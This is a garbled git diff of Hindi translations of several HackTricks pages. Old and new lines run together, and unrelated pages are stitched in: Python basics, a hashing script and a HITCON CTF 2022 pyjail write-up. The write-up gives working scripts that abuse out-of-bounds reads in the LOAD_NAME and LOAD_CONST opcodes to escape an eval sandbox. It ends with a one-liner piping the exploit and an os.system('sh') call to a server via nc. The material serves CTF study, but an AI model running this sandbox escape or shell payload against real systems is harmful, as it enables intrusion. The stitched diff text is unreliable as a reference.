m = **filter**(lambda x: x % 3 == 0, \[1, 2, 3, 4, 5, 6, 7, 8, 9]) = \[3, 6, 9] --> लैम्बडा का उपयोग फ़िल्टर करने के लिए करें\ m = **filter**(lambda x: x % 3 == 0, \[1, 2, 3, 4, 5, 6, 7, 8, 9]) = \[3, 6, 9] --> लैम्बडा का उपयोग फ़िल्टर करने के लिए करें\
**reduce** (lambda x,y: x\*y, \[1,2,3,4]) = 24 **reduce** (lambda x,y: x\*y, \[1,2,3,4]) = 24
``` ```
@ -215,7 +216,7 @@ print “executing finally clause in any case”
``` ```
### Assert() ### Assert()
यदि स्थिति गलत है तो स्क्रीन पर स्ट्रिंग प्रिंट होगी यदि स्थिति गलत है तो स्ट्रिंग स्क्रीन पर प्रिंट होगी
``` ```
def avg(grades, weights): def avg(grades, weights):
assert not len(grades) == 0, 'no grades data' assert not len(grades) == 0, 'no grades data'
@ -223,13 +224,12 @@ assert len(grades) == 'wrong number grades'
``` ```
### जेनरेटर, yield ### जेनरेटर, yield
एक जेनरेटर, कुछ वापस नहीं देता, बल्कि यह कुछ "यील्ड" करता है। जब आप इसे एक्सेस करते हैं, तो यह पहले जेनरेट किया गया पहला मान "वापस" करेगा, फिर, आप इसे फिर से एक्सेस कर सकते हैं और यह अगला जेनरेट किया गया मान वापस करेगा। इसलिए, सभी मान एक साथ नहीं उत्पन्न होते हैं और इसका उपयोग करके सभी मानों वाली एक सूची की बजाय बहुत सारी मेमोरी बचाई जा सकती है। एक जेनरेटर, कुछ वापस नहीं करता, बल्कि वह कुछ "यील्ड" करता है। जब आप इसे एक्सेस करते हैं, तो यह पहले जेनरेट किए गए मान को "रिटर्न" करेगा, फिर, आप इसे फिर से एक्सेस कर सकते हैं और यह अगले जेनरेट किए गए मान को रिटर्न करेगा। इसलिए, सभी मान एक साथ नहीं जेनरेट होते हैं और इसका उपयोग करके एक सूची के बजाय बहुत सारी मेमोरी बचाई जा सकती है।
``` ```
def myGen(n): def myGen(n):
yield n yield n
yield n + 1 yield n + 1
``` ```
```markdown
g = myGen(6) --> 6\ g = myGen(6) --> 6\
next(g) --> 7\ next(g) --> 7\
next(g) --> त्रुटि next(g) --> त्रुटि
@ -245,8 +245,8 @@ re.findall("\w+(la)","hola caracola") = \['la', 'la']
. --> सब कुछ\ . --> सब कुछ\
\w --> \[a-zA-Z0-9\_]\ \w --> \[a-zA-Z0-9\_]\
\d --> संख्या\ \d --> संख्या\
\s --> सफेद जगह वाल वर्ण\[ \n\r\t\f]\ \s --> सफेद जगह वाल वर्ण\[ \n\r\t\f]\
\S --> गैर-सफेद जगह वाल वर्ण\ \S --> गैर-सफेद जगह वाल वर्ण\
^ --> से शुरू होता है\ ^ --> से शुरू होता है\
$ --> से समाप्त होता है\ $ --> से समाप्त होता है\
\+ --> एक या अधिक\ \+ --> एक या अधिक\
@ -264,27 +264,26 @@ re.findall("<.\*?>", "\<b>foo\</b>and\<i>so on\</i>") = \['\<b>', '\</b>', '\<i>
IterTools\ IterTools\
**product**\ **product**\
from **itertools** import product --> 1 या अधिक सूचियों के बीच संयोजन उत्पन्न करता है, शायद मानों को दोहराता है, कार्तेसियन उत्पाद (वितरणीय गुणाकार)\ from **itertools** import product --> 1 या अधिक सूचियों के बीच संयोजन उत्पन्न करता है, शायद मानों को दोहराता है, कार्टेशियन उत्पाद (वितरणीय गुणाकार)\
print list(**product**(\[1,2,3],\[3,4])) = \[(1, 3), (1, 4), (2, 3), (2, 4), (3, 3), (3, 4)]\ print list(**product**(\[1,2,3],\[3,4])) = \[(1, 3), (1, 4), (2, 3), (2, 4), (3, 3), (3, 4)]\
print list(**product**(\[1,2,3],repeat = 2)) = \[(1, 1), (1, 2), (1, 3), (2, 1), (2, 2), (2, 3), (3, 1), (3, 2), (3, 3)] print list(**product**(\[1,2,3],repeat = 2)) = \[(1, 1), (1, 2), (1, 3), (2, 1), (2, 2), (2, 3), (3, 1), (3, 2), (3, 3)]
**permutations**\ **permutations**\
from **itertools** import **permutations** --> हर स्थान में सभी वर्णों के संयोजन उत्पन्न करता है\ from **itertools** import **permutations** --> हर स्थान पर सभी वर्णों के संयोजन उत्पन्न करता है\
print list(permutations(\['1','2','3'])) = \[('1', '2', '3'), ('1', '3', '2'), ('2', '1', '3'),... हर संभावित संयोजन\ print list(permutations(\['1','2','3'])) = \[('1', '2', '3'), ('1', '3', '2'), ('2', '1', '3'),... हर संभावित संयोजन\
print(list(permutations('123',2))) = \[('1', '2'), ('1', '3'), ('2', '1'), ('2', '3'), ('3', '1'), ('3', '2')] हर संभावित संयोजन जिनकी लंबाई 2 है print(list(permutations('123',2))) = \[('1', '2'), ('1', '3'), ('2', '1'), ('2', '3'), ('3', '1'), ('3', '2')] हर संभावित संयोजन लंबाई 2 का
**combinations**\ **combinations**\
from itertools import **combinations** --> विभिन्न वर्णों के बिना दोहराए गए सभी संभावित संयोजन उत्पन्न करता है ("ab" मौजूद है, "ba" उत्पन्न नहीं करता)\ from itertools import **combinations** --> विभिन्न वर्णों के बिना दोहराए गए सभी संभावित संयोजन उत्पन्न करता है ("ab" मौजूद है, "ba" उत्पन्न नहीं करता)\
print(list(**combinations**('123',2))) --> \[('1', '2'), ('1', '3'), ('2', '3')] print(list(**combinations**('123',2))) --> \[('1', '2'), ('1', '3'), ('2', '3')]
**combinations\_with\_replacement**\ **combinations\_with\_replacement**\
from itertools import **combinations\_with\_replacement** --> वर्ण से आगे सभी संभावित संयोजन उत्पन्न करता है (उदाहरण के लिए, तीसरा तीसरे के बाद मिश्रित है लेकिन दूसरे या पहले के साथ नहीं)\ from itertools import **combinations\_with\_replacement** --> वर्ण के बाद से सभी संभावित संयोजन उत्पन्न करता है (उदाहरण के लिए, 3 वाले से 3 वाले को मिश्रित करता है लेकिन 2 वाले या पहले वाले के साथ नहीं)\
print(list(**combinations\_with\_replacement**('1133',2))) = \[('1', '1'), ('1', '1'), ('1', '3'), ('1', '3'), ('1', '1'), ('1', '3'), ('1', '3'), ('3', '3'), ('3', '3'), ('3', '3')] print(list(**combinations\_with\_replacement**('1133',2))) = \[('1', '1'), ('1', '1'), ('1', '3'), ('1', '3'), ('1', '1'), ('1', '3'), ('1', '3'), ('3', '3'), ('3', '3'), ('3', '3)']
### डेकोरेटर्स ### डेकोरेटर्स
किसी फ़ंक्शन को निष्पादित करने के लिए जरूरी समय का आकार बढ़ाने वाला डेकोरेटर (यहाँ से): [यहाँ](https://towardsdatascience.com/decorating-functions-in-python-619cbbe82c74): कोड का समय जितना लगता है उसे निष्पादित करने के लिए डेकोरेटर (यहाँ से): [यहाँ](https://towardsdatascience.com/decorating-functions-in-python-619cbbe82c74):
```
```python ```python
from functools import wraps from functools import wraps
import time import time
@ -302,22 +301,23 @@ return wrapper
def decorated_func(): def decorated_func():
print("Decorated func!") print("Decorated func!")
``` ```
यदि आप इसे चलाते हैं, तो आप कुछ इस प्रकार का कुछ देखेंगे: यदि आप इसे चलाते हैं, तो आप कुछ इस प्रकार का देखेंगे:
``` ```
Let's call our decorated function Let's call our decorated function
Decorated func! Decorated func!
Execution time: 4.792213439941406e-05 seconds Execution time: 4.792213439941406e-05 seconds
``` ```
{% hint style="success" %}
सीखें और प्रैक्टिस करें AWS हैकिंग: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
दूसरे तरीके HackTricks का समर्थन करने के लिए: * [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** को PRs जमा करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}

View file

@ -1,16 +1,17 @@
{% hint style="success" %}
सीखें और प्रैक्टिस AWS हैकिंग: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
दूसरे तरीके HackTricks का समर्थन करने के लिए: * [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह **The PEASS Family** की खोज करें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें** PRs के जरिए [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में सबमिट करके।
</details> </details>
{% endhint %}
```python ```python
import hashlib import hashlib
@ -61,16 +62,17 @@ return 0
main() main()
``` ```
{% hint style="success" %}
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
**GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
दूसरे तरीके HackTricks का समर्थन करने के लिए: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) ज्वाइन करें या [**टेलीग्राम समूह**](https://t.me/peass) में शामिल हों या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके हैकिंग ट्रिक्स साझा करें।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}

View file

@ -1,26 +1,27 @@
# LOAD_NAME / LOAD_CONST ऑपकोड OOB पठन # LOAD_NAME / LOAD_CONST ऑपकोड OOB पठन
{% hint style="success" %}
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks) github repos में PRs सबमिट करके।
</details> </details>
{% endhint %}
**यह जानकारी** [**इस लेख से ली गई थी**](https://blog.splitline.tw/hitcon-ctf-2022/)**।** **यह जानकारी** [**इस लेख से ली गई थी**](https://blog.splitline.tw/hitcon-ctf-2022/)**।**
### TL;DR <a href="#tldr-2" id="tldr-2"></a> ### TL;DR <a href="#tldr-2" id="tldr-2"></a>
हम LOAD_NAME / LOAD_CONST ऑपकोड में OOB पठन की सुविधा का उपयोग कर सकते हैं ताकि हम कुछ प्रतीक को मेमोरी में प्राप्त कर सकें। जिसका मतलब है ट्रिक का उपयोग करना `(a, b, c, ... सैकड़ों प्रतीक ..., __getattribute__) if [] else [].__getattribute__(...)` जैसे किसी प्रतीक (जैसे फ़ंक्शन का नाम) को प्राप्त करना हम LOAD_NAME / LOAD_CONST ऑपकोड में OOB पठन की सुविधा का उपयोग कर सकते हैं ताकि हम कुछ प्रतीक मेमोरी में प्राप्त कर सकें। जिसका मतलब है आप चाहते हैं कि किसी प्रतीक (जैसे कि फ़ंक्शन का नाम) को प्राप्त करने के लिए `(a, b, c, ... सैकड़ों प्रतीक ..., __getattribute__) if [] else [].__getattribute__(...)` जैसे चालाकी का उपयोग करें
फिर अपना उत्पादन तैयार करें। फिर अपना एक्सप्लॉइट तैयार करें।
### अवलोकन <a href="#overview-1" id="overview-1"></a> ### अवलोकन <a href="#overview-1" id="overview-1"></a>
@ -31,7 +32,15 @@ if len(source) > 13337: exit(print(f"{'L':O<13337}NG"))
code = compile(source, '∅', 'eval').replace(co_consts=(), co_names=()) code = compile(source, '∅', 'eval').replace(co_consts=(), co_names=())
print(eval(code, {'__builtins__': {}}))1234 print(eval(code, {'__builtins__': {}}))1234
``` ```
आप विषयस्थ Python कोड दर्ज कर सकते हैं, और यह एक [Python कोड ऑब्जेक्ट](https://docs.python.org/3/c-api/code.html) में कंपाइल हो जाएगा। हालांकि, उस कोड ऑब्ज आप विषयस्थ Python कोड इनपुट कर सकते हैं, और यह [Python कोड ऑब्जेक्ट](https://docs.python.org/3/c-api/code.html) में कंपाइल हो जाएगा। हालांकि, उस कोड ऑब्जेक्ट के `co_consts` और `co_names` को eval करने से पहले खाली टपल के साथ बदल दिया जाएगा।
इस प्रकार, सभी अभिव्यक्ति जिसमें consts (जैसे संख्याएँ, स्ट्रिंग्स आदि) या नाम (जैसे वेरिएबल्स, फंक्शन्स) शामिल हो सकती हैं, उसका अंत में सेगमेंटेशन फॉल्ट हो सकता है।
### बाउंडरी के बाहर पठन <a href="#out-of-bound-read" id="out-of-bound-read"></a>
सेगफॉल्ट कैसे होता है?
एक सरल उदाहरण के साथ शुरू करें, `[a, b, c]` निम्नलिखित बाइटकोड में कंपाइल हो सकता है।
``` ```
1 0 LOAD_NAME 0 (a) 1 0 LOAD_NAME 0 (a)
2 LOAD_NAME 1 (b) 2 LOAD_NAME 1 (b)
@ -39,11 +48,11 @@ print(eval(code, {'__builtins__': {}}))1234
6 BUILD_LIST 3 6 BUILD_LIST 3
8 RETURN_VALUE12345 8 RETURN_VALUE12345
``` ```
लेकिन अगर `co_names` खाली टपल में बदल जाएं? `LOAD_NAME 2`पकोड फिर भी क्रियान्वित होता है, और उस मेमोरी पते से मान पढ़ने की कोशिश करता है जिस पर यह मूल रूप से होना चाहिए था। हाँ, यह एक आउट-ऑफ-बाउंड पढ़ने "सुविधा" है। लेकिन अगर `co_names` खाली टपल बन जाए? `LOAD_NAME 2`पकोड फिर भी क्रियान्वित होता है, और उस मेमोरी पते से मान को पढ़ने की कोशिश करता है जिस पर यह मूल रूप से होना चाहिए था। हाँ, यह एक आउट-ऑफ-बाउंड पठन "सुविधा" है।
समाधान के लिए मूल अवधारणा सरल है। CPython में कुछ ओपकोड जैसे `LOAD_NAME` और `LOAD_CONST` OOB पढ़ने के लिए भेद्य (?) हैं। समाधान के लिए मूल अवधारणा सरल है। CPython में कुछ ऑपकोड जैसे `LOAD_NAME` और `LOAD_CONST` खुलासे के लिए OOB पठन के लिए भेद्य (?) हैं।
वे `consts` या `names` टपल से इंडेक्स `oparg` से एक ऑब्जेक्ट पुनः प्राप्त करते हैं (जो `co_consts` और `co_names` को अंदर से नामित किया जाता है)। हम `LOAD_CONST` के बारे में निम्नलिखित छोटे स्निपेट का संदर्भ ले सकते हैं ताकि हम देख सकें कि CPython `LOAD_CONST` पकोड को प्रोसेस करते समय क्या करता है। वे `consts` या `names` टपल से अनुक्रम `oparg` से एक ऑब्जेक्ट पुनः प्राप्त करते हैं (जो `co_consts` और `co_names` को अंदर से नामित किया जाता है)। हम `LOAD_CONST` के बारे में निम्नलिखित छोटे स्निपेट का संदर्भ ले सकते हैं ताकि हम देख सकें कि CPython `LOAD_CONST` पकोड को प्रोसेस करते समय क्या करता है।
```c ```c
case TARGET(LOAD_CONST): { case TARGET(LOAD_CONST): {
PREDICTED(LOAD_CONST); PREDICTED(LOAD_CONST);
@ -53,12 +62,12 @@ PUSH(value);
FAST_DISPATCH(); FAST_DISPATCH();
}1234567 }1234567
``` ```
इस तरह हम OOB फीचर का उपयोग करके किसी भी मेमोरी ऑफसेट से "नाम" प्राप्त कर सकते हैं। नाम क्या है और इसका ऑफसेट क्या है, यह सुनिश्चित करने के लिए, बस `LOAD_NAME 0`, `LOAD_NAME 1` ... `LOAD_NAME 99` ... को कोशिश करते रहें। और आपको लगभग oparg > 700 में कुछ मिल सकता है। आप gdb का उपयोग करके मेमोरी लेआउट की झलक देखने की कोशिश भी कर सकते हैं, लेकिन मुझे लगता है कि यह और अधिक सरल नहीं होगा? इस तरह हम OOB सुविधा का उपयोग करके किसी भी मेमोरी ऑफसेट से "नाम" प्राप्त कर सकते हैं। यह सुनिश्चित करने के लिए कि उस नाम का क्या है और इसका ऑफसेट क्या है, बस `LOAD_NAME 0`, `LOAD_NAME 1` ... `LOAD_NAME 99` ... को कोशिश करते रहें। और आपको लगभग oparg > 700 में कुछ मिल सकता है। आप मेमोरी लेआउट को देखने के लिए gdb का उपयोग भी कर सकते हैं, लेकिन मुझे लगता है कि यह और अधिक सरल नहीं होगा?
### एक्सप्लॉइट उत्पन्न करना <a href="#generating-the-exploit" id="generating-the-exploit"></a> ### उत्पादन उत्पन्न करना <a href="#generating-the-exploit" id="generating-the-exploit"></a>
नाम / स्थिरांकों के लिए उपयोगी ऑफसेट प्राप्त करने के बाद, हम उस ऑफसेट से नाम / स्थिरांक कैसे प्राप्त करें और उसका उपयोग करें? यहाँ एक ट्रिक है:\ जब हम उन उपयोगी ऑफसेट प्राप्त कर लेते हैं नाम / स्थिर, तो हम उस ऑफसेट से नाम / स्थिर कैसे प्राप्त करें और उसका उपयोग करें? यहां एक चाल है आपके लिए:\
चलिए मान लेते हैं हम ऑफसेट 5 (`LOAD_NAME 5`) से `__getattribute__` नाम प्राप्त कर सकते हैं `co_names=()` के साथ, तो बस निम्नलिखित कार्रवाई करें: चल मान लेते हैं हम ऑफसेट 5 (`LOAD_NAME 5`) से `__getattribute__` नाम प्राप्त कर सकते हैं `co_names=()` के साथ, तो बस निम्नलिखित का करें:
```python ```python
[a,b,c,d,e,__getattribute__] if [] else [ [a,b,c,d,e,__getattribute__] if [] else [
[].__getattribute__ [].__getattribute__
@ -67,7 +76,7 @@ FAST_DISPATCH();
``` ```
> ध्यान दें कि इसे `__getattribute__` के रूप में नाम देना आवश्यक नहीं है, आप इसे कुछ छोटा या अधिक अजीब नाम दे सकते हैं। > ध्यान दें कि इसे `__getattribute__` के रूप में नाम देना आवश्यक नहीं है, आप इसे कुछ छोटा या अधिक अजीब नाम दे सकते हैं।
आप इसके बाइटकोड को देखकर कारण को समझ सकते हैं: आप इसके bytecode को देखकर कारण को समझ सकते हैं:
```python ```python
0 BUILD_LIST 0 0 BUILD_LIST 0
2 POP_JUMP_IF_FALSE 20 2 POP_JUMP_IF_FALSE 20
@ -84,20 +93,20 @@ FAST_DISPATCH();
24 BUILD_LIST 1 24 BUILD_LIST 1
26 RETURN_VALUE1234567891011121314 26 RETURN_VALUE1234567891011121314
``` ```
ध्यान दें कि `LOAD_ATTR` भी `co_names` से नाम प्राप्त करता है। Python नाम को एक ही ऑफसेट से लोड करता है अगर नाम समान है, इसलिए दूसरा `__getattribute__` भी ऑफसेट=5 से लोड होता है। इस सुविधा का उपयोग करके हम एक बार नाम मेमोरी के पास होने परित्याग कर सकते हैं। ध्यान दें कि `LOAD_ATTR` भी `co_names` से नाम प्राप्त करता है। Python नाम को एक ही ऑफसेट से लोड करता है अगर नाम समान है, इसलिए दूसरा `__getattribute__` भी ऑफसेट=5 से लोड होता है। इस सुविधा का उपयोग करके हम जब नाम मेमोरी के पास होता है तो एकाधिक नाम का उपयोग कर सकते हैं।
संख्याएँ उत्पन्न करने के लिए सरल होना चाहिए: नंबर उत्पन्न करने के लिए सरल होना चाहिए:
* 0: not \[\[]] * 0: not \[\[]]
* 1: not \[] * 1: not \[]
* 2: (not \[]) + (not \[]) * 2: (not \[]) + (not \[])
* ... * ...
### शोषण स्क्रिप्ट <a href="#exploit-script-1" id="exploit-script-1"></a> ### शात्र स्क्रिप्ट <a href="#exploit-script-1" id="exploit-script-1"></a>
मैंने लंबाई सीमा के कारण संख्याओं का उपयोग नहीं किया। मैंने लंबाई सीमा के कारण स्थिरों का उपयोग नहीं किया।
पहले यहाँ एक स्क्रिप्ट है जिसका हमें उन नामों के ऑफसेट पता करने के लिए उपयोग करना है। पहले यहाँ एक स्क्रिप्ट है जिसका हमें उन नामों के ऑफसेट पता करने के लिए करना है।
```python ```python
from types import CodeType from types import CodeType
from opcode import opmap from opcode import opmap
@ -132,7 +141,7 @@ print(f'{n}: {ret}')
# for i in $(seq 0 10000); do python find.py $i ; done1234567891011121314151617181920212223242526272829303132 # for i in $(seq 0 10000); do python find.py $i ; done1234567891011121314151617181920212223242526272829303132
``` ```
और निम्नलिखित वास्तविक Python उत्पीड़न उत्पन्न करने के लिए है। और निम्नलिखित वास्तविक पायथन शोषण उत्पन्न करने के लिए है।
```python ```python
import sys import sys
import unicodedata import unicodedata
@ -209,7 +218,7 @@ print(source)
# (python exp.py; echo '__import__("os").system("sh")'; cat -) | nc challenge.server port # (python exp.py; echo '__import__("os").system("sh")'; cat -) | nc challenge.server port
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273
``` ```
यह मुख्य रूप से निम्नलिखित कार् करता है, उन स्ट्रिंग्स के लिए जो हम `__dir__` विधि से प्राप्त करते हैं: यह मुख्य रूप से निम्नलिखित कार्रवाई करता है, उन स्ट्रिंग्स के लिए जो हम `__dir__` विधि से प्राप्त करते हैं:
```python ```python
getattr = (None).__getattribute__('__class__').__getattribute__ getattr = (None).__getattribute__('__class__').__getattribute__
builtins = getattr( builtins = getattr(
@ -222,16 +231,17 @@ getattr(
'__repr__').__getattribute__('__globals__')['builtins'] '__repr__').__getattribute__('__globals__')['builtins']
builtins['eval'](builtins['input']()) builtins['eval'](builtins['input']())
``` ```
{% hint style="success" %}
एडब्ल्यूएस हैकिंग सीखें और प्रैक्टिस करें: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण एडब्ल्यूएस रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
जीसीपी हैकिंग सीखें और प्रैक्टिस करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण जीसीपी रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
दूसरे तरीके HackTricks का समर्थन करने के लिए: * [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
* 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में शामिल हों या हमें ट्विटर पर फॉलो करें 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
